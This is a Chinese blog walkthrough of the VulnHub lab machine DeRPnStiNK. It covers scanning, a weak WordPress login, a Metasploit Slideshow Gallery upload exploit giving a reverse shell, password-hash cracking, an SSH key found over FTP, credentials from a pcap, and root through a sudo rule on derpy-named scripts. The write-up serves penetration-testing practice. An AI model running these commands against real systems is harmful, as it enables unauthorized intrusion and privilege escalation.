vulnhub系列:DeRPnStiNK

最新推荐文章于 2024-08-09 21:07:01 发布
最新推荐文章于 2024-08-09 21:07:01 发布
阅读量597 收藏 10
点赞数 15
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141001508
版权

vulnhub系列:DeRPnStiNK

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240807181243169

nmap扫描端口,开放端口:21、22、80

nmap 192.168.23.182 -p- -A -sV -Pn

image-20240807181348725

访问80端口

image-20240807181531741

flag 1

f12查看源码,发现第一个flag

image-20240807181725873

看到一个txt文件

image-20240807181834601

在/webnootes/info.txt 中,得到提示,在hosts中配置dns

image-20240807181847004

dirb目录扫描,存在phpmyadmin,目录javascript、php、temporary、weblog等,

dirb http://192.168.23.182/

image-20240807182337488

访问temporary,让我加油

image-20240807182843675

访问weblog,发现页面跳转,之前要修改的hosts应该就是这个

http://derpnstink.local/weblog/

image-20240807182958404

在 hosts 中添加

image-20240807183159337

访问 php/phpmyadmin,发现一个mysql管理页面,弱口令和万能密码等尝试一下,没有成功

image-20240807183348102

访问 weblog/wp-admin,是wordpress的登录页面

image-20240807183452078

弱口令成功登录

admin:admin

image-20240807183724568

将kali中的hosts也绑定一下,使用wpscan扫描一下

wpscan --url http://derpnstink.local/weblog/ --enumerate p,t

发现有一个过时的组件

image-20240807184844740

msfconsole搜一下,存在可利用漏洞

msfconsole
search slideshow gallery

image-20240807185051316

二、getshell

开始利用漏洞

use exploit/unix/webapp/wp_slideshowgallery_upload
options
set rhosts 192.168.23.182
set targeturi /weblog/
set wp_user admin
set wp_password admin
run

image-20240807185504975

成功反弹

image-20240807185610731

shell进入交互,并用python提高交互性

python -c "import pty;pty.spawn('/bin/bash')"

image-20240807185749109

三、提权

在 /var/www/html/weblog/wp-config.php 中发现了mysql数据库的账号密码

root:mysql

image-20240807190444847

访问php/phpmyadmin,登录mysql数据库

http://192.168.23.182/php/phpmyadmin

image-20240807190614220

执行命令,查看是否可以 udf 提权,发现存在限制

show variables like '%secure%'

image-20240807190748855

在wp_users表中发现用户 unclestinky 和hash加密的密码

unclestinky
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

image-20240807191012460

将密码保存在hash文件中,使用john工具碰撞

john --wordlist=/usr/share/wordlists/rockyou.txt hash

image-20240807192319876

得到密码wedgie57

unclestinky/wedgie57

flag 2

登录wordpress,在Posts中发现一个flag文件,没有其他新发现

image-20240807191916344

回到shell终端,在home目录下发现两个用户

mrderp
stinky

image-20240807192535355

ssh尝试连接,不支持密码登录

ssh 192.168.23.182

image-20240807192428464

再试试ftp服务连接,mrderp登录失败,stinky登录成功

ftp 192.168.23.182
stinky/wedgie57

image-20240807192743733

在files目录中发现一些文件和目录,test.txt

image-20240807193541488

/files/netword-logs下发现derpissues.txt

image-20240807193906521

在/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh中发现key.txt

image-20240807193305913

全都下载下来

get 文件名

依次查看

derpissues.txt,提到改密码时抓取了数据包

image-20240807194014288

key.txt,是一个密钥

image-20240807194039220

test.txt,vsftpd测试文件

image-20240807194333137

给kye.txt赋予权限,使用密钥连接ssh,连接成功

chmod 600 key.txt
ssh -i key.txt stinky@192.168.23.182

image-20240807194637726

flag 3

Desktop下发现flag文件

image-20240807194858978

Documents下发现pcap文件,应该是前面提到的改密码时抓取的数据包

image-20240807195114130

开启一个web临时服务

python3 -m http.server

image-20240807195504078

将其下载下来,使用wireshark工具打开文件

image-20240807195719446

根据之前的对话,过滤http,寻找修改密码的数据包

image-20240807200146076

在数据包中,发现了账号密码

mrderp/derpderpderpderpderpderpderp

image-20240807200347413

切换mrderp用户

su mrderp

image-20240807200656558

查看当前权限

sudo -l

image-20240807200720918

看到可以在 /home/mrderp/binaries 下执行 derpy 开头的文件,那么我们就创建这样一个目录,然后在该目录下创建一个 derpy 开头的可执行文件

cd /home/mrderp/
mkdir binaries
cd binaries
echo "/bin/bash" > derpy.sh
chmod 777 derpy.sh
sudo ./derpy.sh

成功提权

image-20240807201207054

flag 4

在 /root/Desktop 下发现flag文件

image-20240807201318329

三天三夜睡不着
关注
  • 15
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub:Derpnstink靶机渗透
m0_62008601的博客
12-26 1204
渗透学习
Vulnhub靶场篇:VulnHub2018_DeRPnStiNK
夜车星繁的博客
05-13 1221
靶场难度:中下难度 VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 攻击机win10:本机 靶 机IP:192.168.223.141 首先进行信息收集:
Vulnhub:DerpNStink 1靶机
qq_43884092的博客
04-28 1121
wordpress后台弱口令,插件Slideshow任意文件上传
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 923
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 803
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
vulnhub:DeRPnStiNK
墨染的博客
10-09 1688
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
Vulnhub:DeRPnStiNK渗透测试
mandarava的博客
03-08 1007
老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx。 Nmap scan report for xxx.xxx.xxx.xxx Host is up (1.2s latency). Not shown: 996 closed ports PORT STATE SERVICE 21/tcp open f...
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 1977
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
vulnhub系列:PumpkinFestival
最新发布
jq_j37的博客
08-09 563
vulnhub系列:PumpkinFestival靶机,打靶文章
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
m0_57291352的博客
08-09 603
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 874
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1037
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 191
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
vulnhub靶机系列
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值